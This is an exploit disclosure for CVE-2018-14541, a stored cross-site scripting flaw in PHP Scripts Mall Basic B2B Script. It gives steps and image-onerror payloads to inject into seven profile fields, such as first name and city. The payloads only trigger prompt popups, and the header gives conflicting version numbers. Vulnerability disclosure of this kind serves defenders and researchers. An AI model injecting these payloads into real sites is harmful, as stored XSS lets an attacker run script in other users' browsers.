******************************************************************************************* # Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. # Date: 20.07.2018 # Site Titel : B2B Script # Vendor Homepage: https://www.phpscriptsmall.com/ #Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/ # Software Link: http://readymadeb2bscript.com/basic-b2b/ # Category: Web Application # Version: 2.0.9 # Exploit Author: Vikas Chaudhary # Contact: https://www.facebook.com/profile.php?id=100011287630308 # Web: https://gkaim.com/ #Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/ # Tested on: Windows 10 -Firefox # CVE- CVE-2018-14541 ***************************************************************************************** Proof of Concept:- -------------------------- 1. Go to the site (https://www.server.com/professional-b2b-script/ ). 2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on ... 3- Goto your mail and Verify it. 4-Come back to site and Login using your Verified Mail and Password. 6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter. in FIRST NAME => "><img src=x onerror=prompt(/VIKAS/)> in LAST NAME => "><img src=x onerror=prompt(/CHAUDHARY/)> in ADDRESS 1 => "><img src=x onerror=prompt(/MYAIM/)> in ADDRESS 2 => "><img src=x onerror=prompt(/GKAIM/)> in CITY => "><img src=x onerror=prompt(/HRFP/)> in STATE => "><img src=x onerror=prompt(/ETHICAL/)> in COMPANY NAME => "><img src=x onerror=prompt(/HACKER/)> Now click on SUBMIT and refresh the page You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/ in you account.. ***************************************************************************************